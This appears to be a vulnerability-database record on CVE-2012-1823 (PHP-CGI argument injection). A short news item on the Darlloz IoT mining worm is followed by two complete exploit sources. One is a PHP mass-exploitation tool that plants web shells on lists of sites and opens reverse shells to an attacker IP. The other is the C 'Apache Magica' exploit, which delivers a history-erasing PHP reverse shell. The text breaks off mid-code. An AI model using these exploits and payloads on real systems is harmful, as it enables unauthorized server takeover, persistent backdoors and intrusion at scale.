Home Routers, Set-top boxes, Security Cameras, printers and Industrial control systems, has now been upgraded to mine cryptocurrencies like Bitcoin.\n\n \n\n\nSecurity researchers at antivirus firm [Symantec](<http://www.symantec.com/connect/blogs/iot-worm-used-mine-cryptocurrency>) spotted the Darlloz Linux worm back in November, and they spotted the latest variant of the worm in mid-January this year.\n\n \n\n\nThe _Linux.Darlloz_ worm exploits a PHP vulnerability (__[CVE-2012-1823](<https://thehackernews.com/2013/11/Linux-ELF-malware-php-cgi-vulnerability.html>)__) to propagate and is capable of infecting devices that run Linux on Intel\u2019s x86 chip architecture and other embedded device architectures such as PPC, MIPS and MIPSEL.\n\n \n\n\nThe latest variant of _Linux.Darlloz_, equipped with an open source cryptocurrency mining tool called '_[cpuminer](<https://sourceforge.net/projects/cpuminer/>)_', could be used to mine Mincoins, Dogecoins or [Bitcoins](<https://thehackernews.com/search/label/Bitcoin>).\n\n \n\n\nSymantec researchers scanned the entire address space of the Internet and found 31,716 devices infected with Darlloz. \"_By the end of February 2014, the attacker mined 42,438 Dogecoins (approximately US$46 at the time of writing) and 282 Mincoins (approximately US$150 at the time of writing). 
These amounts are relatively low for the average cybercrime activity so, we expect the attacker to continue to evolve their threat for increased monetization._\" said Kaoru Hayashi, senior development manager and threat analyst with Symantec in Japan.\n\n \n\n\nThe most heavily infected countries are China, the U.S., South Korea, Taiwan and India.\n\n[](<https://1.bp.blogspot.com/-EtVgrEz1c3o/UyqcCffn2-I/AAAAAAAAas8/tx2Irf9tGFA/s1600/Darlloz-hack-malware.png>)\n\nCryptocurrency mining typically requires more memory and powerful CPUs, so the [malware](<https://thehackernews.com/search/label/Malware>) could be updated to target other IoT devices in the future, such as home automation devices and wearable technology. \n \nA few weeks back, Cisco announced a global and industry-wide initiative to bring the security community and researchers together to contribute to securing the Internet of Things (IoT), and launched a contest called the \"**[Internet of Things Grand Security Challenge](<https://thehackernews.com/2014/03/Internet-of-Things-Security-Apps.html>)**\", offering prizes of up to $300,000 for winners.\n\n \n\n\nUsers are advised to update firmware and apply security patches for all software installed on computers or Internet-enabled devices. 
Make sure you are not using the default username or password on any device, and block access to port 23 or 80 from outside if it is not required.\n", "modified": "2014-03-20T09:28:58", "published": "2014-03-19T22:26:00", "id": "THN:26139DCDB80F29AA56F9DB9ADFBD986B", "href": "https://thehackernews.com/2014/03/linux-worm-targets-internet-enabled.html", "type": "thn", "title": "Linux Worm targets Internet-enabled Home appliances to Mine Cryptocurrencies", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-01-08T18:01:12", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823"], "description": "None\n", "modified": "2013-11-30T20:08:11", "published": "2013-11-30T09:08:00", "id": "THN:F0587F0EFE1B937682CDBA5338BDE708", "href": "http://thehackernews.com/2013/11/Linux-ELF-malware-php-cgi-vulnerability.html", "type": "thn", "title": "Linux worm targeting Routers, Set-top boxes and Security Cameras with PHP-CGI Vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-1823"], "description": "<?php\r\n\r\n######################################### www.bugreport.ir \r\n########################################\r\n#\r\n# Title: PHP CGI Argument Injection Remote Exploit \r\nV0.3 - PHP Version\r\n# Vendor: http://www.php.net\r\n# Vulnerable Version: PHP up to version 5.3.12 and 5.4.2\r\n# Exploitation: Remote\r\n# Original Advisory: \r\nhttp://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\r\n# Original Exploit URL: http://www.bugreport.ir/79/exploit.htm\r\n# CVE: CVE-2012-1823\r\n# Coded By: Mostafa Azizi (admin[@]0-Day[dot]net)\r\n###################################################################################################\r\n\r\n/* This tool may be used for legal purposes only. 
Users take full \r\nresponsibility for any actions performed using this tool.\r\nThe author accepts no liability for damage caused by this tool. If \r\nthese terms are not acceptable to you, then do not use this tool.*/\r\n\r\nerror_reporting(0);\r\nini_set("max_execution_time",0);\r\nini_set("default_socket_timeout", 10);\r\nob_implicit_flush (1);\r\n\r\necho'<html>\r\n<head>\r\n<title>PHP CGI Argument Injection Remote Exploit</title>\r\n</head>\r\n<p align="center"><font size="4" color="#5E767E">PHP CGI Argument \r\nInjection</font></p>\r\n<p align="center"><font size="3" color="#4E8975">Coded by: Mostafa \r\nAzizi (admin[@]0-Day[dot]net)</font></p>\r\n<body bgcolor="#00000">\r\n<table align="center" border="5">\r\n<tr>\r\n <th><p align="center"><font size="4" color="#8BB381">Mass File \r\nUploader</font></p>\r\n</th>\r\n<th></th>\r\n <th><p align="center"><font size="4" color="#8BB381">Reverse \r\nShell</font></p>\r\n</th>\r\n </tr>\r\n<tr>\r\n <td><form name="form1" action="'.$SERVER[PHP_SELF].'" \r\nenctype="multipart/form-data" method="post">\r\n </br>\r\n <p></font><font color="#FFF8C6" >Please specify a file to \r\nscan: </font></br><input type="file" name="listfile" \r\nsize="40"><font color="#FF0000"> * </font>\r\n <p></font><font color="#FFF8C6" >Please specify a file to \r\nupload: </font></br><input type="file" name="datafile" \r\nsize="40"><font color="#FF0000"> * </font>\r\n <p><font color="#FFF8C6" > specify a port (default is 80): \r\n </font></br><input name="port" size="20"><span \r\nclass="Stile5"></span></p>\r\n <p><font color="#FFF8C6" > Proxy (ip:port): \r\n </font></br><input name="proxy" size="20"><span \r\nclass="Stile5"></span></p>\r\n <p align="center"> <span class="Stile5"><font \r\ncolor="#FF0000">* </font><font color="white" >fields are \r\nrequired</font></font></span></p>\r\n </br>\r\n <p align="center"><input type="submit" value="Start Attack" \r\nname="Submit"></p>\r\n </form> </td>\r\n <td></td>\r\n <td><form name="form1" 
action="'.$SERVER[PHP_SELF].'" \r\nenctype="multipart/form-data" method="post">\r\n </br>\r\n <p></font><font color="#FFF8C6" > hostname (ex: \r\nwww.sitename.com):</font></br><input name="host" size="20"> <span \r\nclass="Stile5"></span></p>\r\n <p></font><font color="#FFF8C6" > Your IP (ex: \r\n173.194.35.169 ): </font></br><input name="lip" size="20"> \r\n<span class="Stile5"></span></p>\r\n <p><font color="#FFF8C6" > Your Port (ex: \r\n80):</font></br><input name="lport" size="20"> <span \r\nclass="Stile5"></span></p>\r\n </br></br>\r\n <p align="center"> <span class="Stile5"><font \r\ncolor="#FF0000">All </font><font color="white" >fields are \r\nrequired</font></font></span></p>\r\n </br>\r\n <p align="center"><input type="submit" value="Start Attack" \r\nname="Submit2"></p>\r\n </form> </td>\r\n </tr>\r\n</table>\r\n</font>\r\n<table width="90%">\r\n <tbody>\r\n <tr>\r\n <td width="43%" align="left">\r\n\r\n </td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n</body></html>';\r\n\r\n $host = $_POST['host'];\r\n $lip = $_POST['lip'];\r\n $lport = $_POST['lport'];\r\n $port = $_POST['port'];\r\n $proxy = $_POST['proxy'];\r\n $list = file($_FILES['listfile']['tmp_name']);\r\n $file = \r\nbase64_encode(gzdeflate(file_get_contents($_FILES['datafile']['tmp_name'])));\r\n $shell = "gzinflate(base64_decode(\"$file\"))";\r\n\r\nif (isset($_POST['Submit2']) && $host != '' && $lip != '' && $lport != '')\r\n{\r\n /*pentestmonkey's php-reverse-shell.\r\n Limitations: proc_open and stream_set_blocking require PHP version \r\n4.3+, or 5+ */\r\n\r\n /* Connect Back */\r\n\r\n $payload = "<?php set_time_limit (0); \$VERSION = \"1.0\"; \$ip = \r\n'$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null; \r\n\$error_a = null; \$shell = 'uname -a; w; id; /bin/sh -i'; \$daemon = \r\n0;\$debug = 0; if (function_exists('pcntl_fork')) { \$pid = \r\npcntl_fork(); if (\$pid == -1) { printit(\"ERROR: Can't fork\"); \r\nexit(1);} if (\$pid) { exit(0);} if (posix_setsid() == -1) { 
\r\nprintit(\"Error: Can't setsid()\"); exit(1); } \$daemon = 1;} else { \r\nprintit(\"WARNING: Failed to daemonise. This is quite common and not \r\nfatal.\");}chdir(\"/\"); umask(0); \$sock = fsockopen(\$ip, \$port, \r\n\$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\"); \r\nexit(1);} \$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 => \r\narray(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process = \r\nproc_open(\$shell, \$descriptorspec, \$pipes);if \r\n(!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\"); \r\nexit(1);}stream_set_blocking(\$pipes[0], \r\n0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2], \r\n0);stream_set_blocking(\$sock, 0);printit(\"Successfully opened \r\nreverse shell to \$ip:\$port\"); while (1) { if (feof(\$sock)) { \r\nprintit(\"ERROR: Shell connection terminated\"); break;} if \r\n(feof(\$pipes[1])) {printit(\"ERROR: Shell process \r\nterminated\");break;}\$read_a = array(\$sock, \$pipes[1], \r\n\$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a, \r\n\$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug) \r\nprintit(\"SOCK READ\");\$input = fread(\$sock, \r\n\$chunk_size);if(\$debug) printit(\"SOCK: \r\n\$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1], \r\n\$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input = \r\nfread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT: \r\n\$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2], \r\n\$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input = \r\nfread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR: \r\n\$input\");fwrite(\$sock, \r\n\$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print \"\$string\n\";}} \r\n?>";\r\n $packet = "POST \r\n".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input \r\nHTTP/1.1\r\n";\r\n $packet .= "Host: 
".$host."\r\n";\r\n $packet .= "User-Agent: PHP CGI Argument Injection Exploiter\r\n";\r\n $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";\r\n $packet .= "Content-Length: ".strlen($payload)."\r\n\r\n";\r\n $packet .= $payload."\r\n\r\n\r\n\r\n";\r\n sendpacket($packet,1,0,0);\r\n\r\n}elseif (isset($_POST['Submit']) && $list != '' && $file != '')\r\n{\r\n if ($port=='') {$port=80;}\r\n\r\n for ($n =0; $n < count($list); $n++)\r\n {\r\n\r\n $siteAddbackup = $list[$n];\r\n $siteAdd=str_replace("http://","",$siteAddbackup);\r\n \r\npreg_match('/^(?:(?:http|https):\/\/)?[^\/]+(\/.+\/)[^\/\.]+\.[^\/\.]+$/i',$siteAddbackup, \r\n$match);\r\n $path = $match[1];\r\n $pa = strstr(trim($siteAdd),$path);\r\n $host=trim(str_replace($pa,"",$siteAdd));\r\n if ($path ==''){$path = "/"; }\r\n if ($proxy=='') {$p=$path;} else {$p='http://'.$host.$path;}\r\n\r\n /* Checking \r\nAvailability */\r\n\r\n $connection = fsockopen($host,$port);\r\n if (!$connection)\r\n // site is down\r\n {\r\n echo '<font color=red> No response from \r\n'.htmlentities($host).' ...<br></font>';\r\n \r\nfile_put_contents(realpath(dirname(__FILE__)).'/notconnected.txt', \r\n$siteAddbackup."\r\n", FILE_APPEND);\r\n }\r\n else\r\n // site is up\r\n {\r\n fclose($connection);\r\n Exploitable($host,$path,$p);\r\n }\r\n\r\n}\r\n}\r\n\r\nFunction Exploitable($host,$path,$p)\r\n{\r\n global $html;\r\n $i=0;\r\n /* Checking Exploitability */\r\n $packet = "GET ".$p."?-s HTTP/1.1\r\n";\r\n $packet .= "Host: ".$host."\r\n";\r\n $packet .= "User-Agent: PHP CGI Argument Injection Exploiter \r\n\r\n";\r\n sendpacket($packet,1,0,0);\r\n $str = array(\r\n '<code><span','&lt;?');\r\n foreach ($str as $value => $search){\r\n if(stristr($html, $search) == TRUE)\r\n {$i=$i+1;}}\r\n switch($i)\r\n {\r\n case 0:\r\n echo '<font color=red>'.$host.' Faild!<br></font>';\r\n break;\r\n case 2:\r\n echo '<font color=#FFF8C6>'.$host.' 
Exploitable<br></font>';\r\n Exploit($host,$path,$p);\r\n }\r\n}\r\n\r\nFunction Exploit($host,$path,$p)\r\n{\r\nglobal $html, $shell;\r\n /* Exploiting */\r\n\r\n $payload = "<?php \$myFile = \"legalpentest.php\"; \$filehandle = \r\nfopen(\$myFile, 'w') or die(\"can't open file\"); \$Data=$shell; \r\nfwrite(\$filehandle, \$Data);fclose(\$filehandle);";\r\n $packet = "POST \r\n".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input \r\nHTTP/1.1\r\n";\r\n $packet .= "Host: ".$host."\r\n";\r\n $packet .= "User-Agent: PHP CGI Argument Injection Exploiter\r\n";\r\n $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";\r\n $packet .= "Content-Length: ".strlen($payload)."\r\n\r\n";\r\n $packet .= $payload."\r\n\r\n\r\n\r\n";\r\n sendpacket($packet,1,0,0);\r\n /* Check for successfully \r\nuploaded */\r\n $packet = "HEAD ".$p."/legalpentest.php HTTP/1.1\r\n";\r\n $packet .= "Host: ".$host."\r\n";\r\n $packet .= "User-Agent: :) \r\n\r\n";\r\n sendpacket($packet,1,0,0);\r\n\r\n if(stristr($html , '404 Not Found') == true)\r\n {\r\n echo '<font color=#FFF8C6><br>Exploit \r\nFaild...<br>-------------------------------------------------------<br></font>';\r\n }\r\n else {\r\n echo "<font color=#FFF8C6><br>Exploit \r\nSucceeded...<br>http://$host$path"."/legalpentest.php<br>-------------------------------------------------------<br></font>";\r\n file_put_contents(realpath(dirname(__FILE__)).'/shell.txt', \r\n"http://$host$path"."/legalpentest.php\r\n", FILE_APPEND);\r\n }\r\n}\r\n\r\n\r\nfunction sendpacket($packet,$response = 0,$output = 0,$s=0)\r\n{\r\n $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';\r\n global $proxy, $host, $port, $html, $user, $pass;\r\n if ($proxy == '')\r\n {\r\n $ock = fsockopen($host,$port);\r\n stream_set_timeout($ock, 5);\r\n if (!$ock)\r\n {\r\n echo 'No response from '.htmlentities($host).' 
...<br>';\r\n stream_set_timeout($ock, 4);\r\n }\r\n } else\r\n {\r\n $parts = explode(':',$proxy);\r\n // echo '<font color=white>Connecting to proxy: \r\n'.$parts[0].':'.$parts[1].' ...<br><br/></font>';\r\n $ock = fsockopen($parts[0],$parts[1]);\r\n stream_set_timeout($ock, 5);\r\n if (!$ock)\r\n {\r\n echo 'No response from proxy...<br>';\r\n fclose($ock);\r\n }\r\n }\r\n\r\n if ($ock)\r\n {\r\n fputs($ock,$packet);\r\n if ($response == 1)\r\n {\r\n if ($proxy == '')\r\n {\r\n $html = '';\r\n while (!feof($ock))\r\n {\r\n $html .= fgets($ock);\r\n }\r\n } else\r\n {\r\n $html = '';\r\n while ((!feof($ock)) or \r\n(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))\r\n {\r\n $html .= fread($ock,1);\r\n }\r\n }\r\n } else $html = '';\r\n\r\n fclose($ock);\r\n }\r\n}\r\n?>\r\n", "edition": 1, "modified": "2012-05-24T00:00:00", "published": "2012-05-24T00:00:00", "id": "SECURITYVULNS:DOC:28089", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28089", "title": "PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache + PHP 5.3.12 5.4.2 - cgi-bin Remote Code Execution", "edition": 1, "published": "2013-10-29T00:00:00", "title": "Apache + PHP 5.3.12 5.4.2 - cgi-bin Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1823"], "modified": "2013-10-29T00:00:00", "id": "EXPLOITPACK:85B20F0533D328BC2DFA7020D0F11896", "href": "", "sourceData": "/* Apache Magica by Kingcope */\n/* gcc apache-magika.c -o apache-magika -lssl */\n/* This is a code execution bug in the combination of Apache and PHP.\nOn Debian and Ubuntu the vulnerability is present in the default install\nof the php5-cgi package. 
When the php5-cgi package is installed on Debian and\nUbuntu or php-cgi is installed manually the php-cgi binary is accessible under\n/cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute\nthe binary because this binary has a security check enabled when installed with\nApache http server and this security check is circumvented by the exploit.\nWhen accessing the php-cgi binary the security check will block the request and\nwill not execute the binary.\nIn the source code file sapi/cgi/cgi_main.c of PHP we can see that the security\ncheck is done when the php.ini configuration setting cgi.force_redirect is set\nand the php.ini configuration setting cgi.redirect_status_env is set to no.\nThis makes it possible to execute the binary bypassing the Security check by\nsetting these two php.ini settings.\nPrior to this code for the Security check getopt is called and it is possible\nto set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the\n-d switch. If both values are set to zero and the request is sent to the server\nphp-cgi gets fully executed and we can use the payload in the POST data field\nto execute arbitrary php and therefore we can execute programs on the system.\napache-magika.c is an exploit that does exactly the prior described. It does\nsupport SSL.\n/* Affected and tested versions\nPHP 5.3.10\nPHP 5.3.8-1\nPHP 5.3.6-13\nPHP 5.3.3\nPHP 5.2.17\nPHP 5.2.11\nPHP 5.2.6-3\nPHP 5.2.6+lenny16 with Suhosin-Patch\nAffected versions\nPHP prior to 5.3.12\nPHP prior to 5.4.2\nUnaffected versions\nPHP 4 - getopt parser unexploitable\nPHP 5.3.12 and up\nPHP 5.4.2 and up\nUnaffected versions are patched by CVE-2012-1823.\n*/\n/* .\n /'\\rrq rk\n . 
// \\\\ .\n.x.//fco\\\\-|-\n '//cmtco\\\\zt\n //6meqrg.\\\\tq\n//_________\\\\'\nEJPGQO\napache-magica.c by Kingcope\n*/\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <getopt.h>\n#include <sys/types.h>\n#include <stddef.h>\n#include <openssl/rand.h>\n#include <openssl/ssl.h>\n#include <openssl/err.h>\n#include <netdb.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n\ntypedef struct {\n\tint sockfd;\n\tSSL *handle;\n\tSSL_CTX *ctx;\n} connection;\n\nvoid usage(char *argv[])\n{\n printf(\"usage: %s <--target target> <--port port> <--protocol http|https> \" \\\n \"<--reverse-ip ip> <--reverse-port port> [--force-interpreter interpreter]\\n\",\n argv[0]);\n exit(1);\n}\n\nchar poststr[] = \"POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F\" \\\n \"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64\" \\\n \"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73\" \\\n \"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E\" \\\n \"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63\" \\\n \"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62\" \\\n \"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74\" \\\n \"%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68\" \\\n \"%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F\" \\\n \"%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63\" \\\n \"%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73\" \\\n \"%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\\r\\n\" \\\n \"Host: %s\\r\\n\" \\\n \"User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26\" \\\n \"(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\\r\\n\" \\\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \\\n \"Content-Length: %d\\r\\n\" \\\n \"Connection: close\\r\\n\\r\\n%s\";\nchar phpstr[] = \"<?php\\n\" \\\n\"set_time_limit(0);\\n\" 
\\\n\"$ip = '%s';\\n\" \\\n\"$port = %d;\\n\" \\\n\"$chunk_size = 1400;\\n\" \\\n\"$write_a = null;\\n\" \\\n\"$error_a = null;\\n\" \\\n\"$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';\\n\" \\\n\"$daemon = 0;\\n\" \\\n\"$debug = 0;\\n\" \\\n\"if (function_exists('pcntl_fork')) {\\n\" \\\n\"\t$pid = pcntl_fork();\t\\n\" \\\n\"\tif ($pid == -1) {\\n\" \\\n\"\t\tprintit(\\\"ERROR: Can't fork\\\");\\n\" \\\n\"\t\texit(1);\\n\" \\\n\"\t}\\n\" \\\n\"\tif ($pid) {\\n\" \\\n\"\t\texit(0);\\n\" \\\n\"\t}\\n\" \\\n\"\tif (posix_setsid() == -1) {\\n\" \\\n\"\t\tprintit(\\\"Error: Can't setsid()\\\");\\n\" \\\n\"\t\texit(1);\\n\" \\\n\"\t}\\n\" \\\n\"\t$daemon = 1;\\n\" \\\n\"} else {\\n\" \\\n\"\tprintit(\\\"WARNING: Failed to daemonise.\\\");\\n\" \\\n\"}\\n\" \\\n\"chdir(\\\"/\\\");\\n\" \\\n\"umask(0);\\n\" \\\n\"$sock = fsockopen($ip, $port, $errno, $errstr, 30);\\n\" \\\n\"if (!$sock) {\\n\" \\\n\"\tprintit(\\\"$errstr ($errno)\\\");\\n\" \\\n\"\texit(1);\\n\" \\\n\"}\\n\" \\\n\"$descriptorspec = array(\\n\" \\\n\" 0 => array(\\\"pipe\\\", \\\"r\\\"),\\n\" \\\n\" 1 => array(\\\"pipe\\\", \\\"w\\\"),\\n\" \\\n\" 2 => array(\\\"pipe\\\", \\\"w\\\")\\n\" \\\n\");\\n\" \\\n\"$process = proc_open($shell, $descriptorspec, $pipes);\\n\" \\\n\"if (!is_resource($process)) {\\n\" \\\n\"\tprintit(\\\"ERROR: Can't spawn shell\\\");\\n\" \\\n\"\texit(1);\\n\" \\\n\"}\\n\" \\\n\"stream_set_blocking($pipes[0], 0);\\n\" \\\n\"stream_set_blocking($pipes[1], 0);\\n\" \\\n\"stream_set_blocking($pipes[2], 0);\\n\" \\\n\"stream_set_blocking($sock, 0);\\n\" \\\n\"while (1) {\\n\" \\\n\"\tif (feof($sock)) {\\n\" \\\n\"\t\tprintit(\\\"ERROR: Shell connection terminated\\\");\\n\" \\\n\"\t\tbreak;\\n\" \\\n\"\t}\\n\" \\\n\"\tif (feof($pipes[1])) {\\n\" \\\n\"\t\tprintit(\\\"ERROR: Shell process terminated\\\");\\n\" \\\n\"\t\tbreak;\\n\" \\\n\"\t}\\n\" \\\n\"\t$read_a = array($sock, $pipes[1], $pipes[2]);\\n\" \\\n\"\t$num_changed_sockets = stream_select($read_a, 
$write_a, $error_a, null);\\n\" \\\n\"\tif (in_array($sock, $read_a)) {\\n\" \\\n\"\t\tif ($debug) printit(\\\"SOCK READ\\\");\\n\" \\\n\"\t\t$input = fread($sock, $chunk_size);\\n\" \\\n\"\t\tif ($debug) printit(\\\"SOCK: $input\\\");\\n\" \\\n\"\t\tfwrite($pipes[0], $input);\\n\" \\\n\"\t}\\n\" \\\n\"\tif (in_array($pipes[1], $read_a)) {\\n\" \\\n\"\t\tif ($debug) printit(\\\"STDOUT READ\\\");\\n\" \\\n\"\t\t$input = fread($pipes[1], $chunk_size);\\n\" \\\n\"\t\tif ($debug) printit(\\\"STDOUT: $input\\\");\\n\" \\\n\"\t\tfwrite($sock, $input);\\n\" \\\n\"\t}\\n\" \\\n\"\tif (in_array($pipes[2], $read_a)) {\\n\" \\\n\"\t\tif ($debug) printit(\\\"STDERR READ\\\");\\n\" \\\n\"\t\t$input = fread($pipes[2], $chunk_size);\\n\" \\\n\"\t\tif ($debug) printit(\\\"STDERR: $input\\\");\\n\" \\\n\"\t\tfwrite($sock, $input);\\n\" \\\n\"\t}\\n\" \\\n\"}\\n\" \\\n\"\\n\" \\\n\"fclose($sock);\\n\" \\\n\"fclose($pipes[0]);\\n\" \\\n\"fclose($pipes[1]);\\n\" \\\n\"fclose($pipes[2]);\\n\" \\\n\"proc_close($process);\\n\" \\\n\"function printit ($string) {\\n\" \\\n\"\tif (!$daemon) {\\n\" \\\n\"\t\tprint \\\"$string\\n\\\";\\n\" \\\n\"\t}\\n\" \\\n\"}\\n\" \\\n\"exit(1);\\n\" \\\n\"?>\";\n\nstruct sockaddr_in *gethostbyname_(char *hostname, unsigned short port)\n{\n struct hostent *he;\n struct sockaddr_in server, *servercopy;\n \n if ((he=gethostbyname(hostname)) == NULL) {\n printf(\"Hostname cannot be resolved\\n\");\n exit(255);\n }\n \n servercopy = malloc(sizeof(struct sockaddr_in));\n if (!servercopy) {\n\tprintf(\"malloc error (1)\\n\");\n\texit(255);\n }\n memset(&server, '\\0', sizeof(struct sockaddr_in));\n memcpy(&server.sin_addr, he->h_addr_list[0], he->h_length);\n server.sin_family = AF_INET;\n server.sin_port = htons(port);\n memcpy(servercopy, &server, sizeof(struct sockaddr_in));\n return servercopy;\n}\n\nchar *sslread(connection *c)\n{\n char *rc = NULL;\n int received, count = 0, count2=0;\n char ch;\n\n for(;;)\n {\n if (!rc)\n rc = calloc(1024, sizeof (char) 
+ 1);\n else\n if (count2 % 1024 == 0) {\n rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);\n }\n received = SSL_read(c->handle, &ch, 1);\n if (received == 1) {\n rc[count++] = ch;\n count2++;\n if (count2 > 1024*5)\n\t break;\n }\n else\n break;\n }\n return rc;\n}\n\nchar *read_(int sockfd)\n{\n char *rc = NULL;\n int received, count = 0, count2=0;\n char ch;\n\n for(;;)\n {\n if (!rc)\n rc = calloc(1024, sizeof (char) + 1);\n else\n if (count2 % 1024 == 0) {\n rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);\n }\n received = read(sockfd, &ch, 1);\n if (received == 1) {\n rc[count++] = ch;\n count2++;\n if (count2 > 1024*5)\n\t break;\n }\n else\n break;\n }\n return rc;\n}\n\nvoid main(int argc, char *argv[])\n{\n char *target, *protocol, *targetip, *writestr, *tmpstr, *readbuf=NULL,\n *interpreter, *reverseip, *reverseportstr, *forceinterpreter=NULL;\n char httpsflag=0;\n unsigned short port=0, reverseport=0;\n struct sockaddr_in *server;\n int sockfd;\n unsigned int writesize, tmpsize;\n unsigned int i;\n connection *sslconnection;\n printf(\"-== Apache Magika by Kingcope ==-\\n\");\n for(;;)\n {\n\t int c;\n int option_index=0;\n static struct option long_options[] = {\n\t {\"target\", required_argument, 0, 0 },\n\t {\"port\", required_argument, 0, 0 },\n\t {\"protocol\", required_argument, 0, 0 },\n\t {\"reverse-ip\", required_argument, 0, 0 },\n\t {\"reverse-port\", required_argument, 0, 0 },\n\t {\"force-interpreter\", required_argument, 0, 0 },\t \n\t {0, 0, 0, 0 }\n\t };\n\t \n\t c = getopt_long(argc, argv, \"\", long_options, &option_index);\n if (c < 0)\n \tbreak;\n \n switch (c) {\n\t case 0:\n\t switch (option_index) {\n\t case 0:\n\t if (optarg) {\n\t target = calloc(strlen(optarg)+1, sizeof(char));\n\t if (!target) {\n\t\t printf(\"calloc error (2)\\n\");\n\t exit(255);\n }\n\t memcpy(target, optarg, strlen(optarg)+1);\n \t}\n break;\n case 1:\n if(optarg)\n\t port = atoi(optarg);\n break;\n case 2:\n protocol = 
calloc(strlen(optarg)+1, sizeof(char));\n if (!protocol) {\n\t printf(\"calloc error (3)\\n\");\n exit(255);\n }\n memcpy(protocol, optarg, strlen(optarg)+1);\n if (!strcmp(protocol, \"https\"))\n httpsflag=1;\n break;\n case 3:\n reverseip = calloc(strlen(optarg)+1, sizeof(char));\n if (!reverseip) {\n\t printf(\"calloc error (4)\\n\");\n exit(255);\n }\n memcpy(reverseip, optarg, strlen(optarg)+1); \n break;\n case 4:\n\t reverseport = atoi(optarg); \n\t\treverseportstr = calloc(strlen(optarg)+1, sizeof(char));\n if (!reverseportstr) {\n\t printf(\"calloc error (5)\\n\");\n exit(255);\n }\n memcpy(reverseportstr, optarg, strlen(optarg)+1); \t \n break;\n case 5:\n forceinterpreter = calloc(strlen(optarg)+1, sizeof(char));\n if (!forceinterpreter) {\n\t printf(\"calloc error (6)\\n\");\n exit(255);\n }\n memcpy(forceinterpreter, optarg, strlen(optarg)+1); \n break;\n default:\n usage(argv);\n\t }\n\t break;\n\t \n\t default:\n\t usage(argv);\n }\n }\n\n if ((optind < argc) || !target || !protocol || !port ||\n !reverseip || !reverseport){\n\tusage(argv);\n }\n \n server = gethostbyname_(target, port);\n if (!server) {\n printf(\"Error while resolving hostname. 
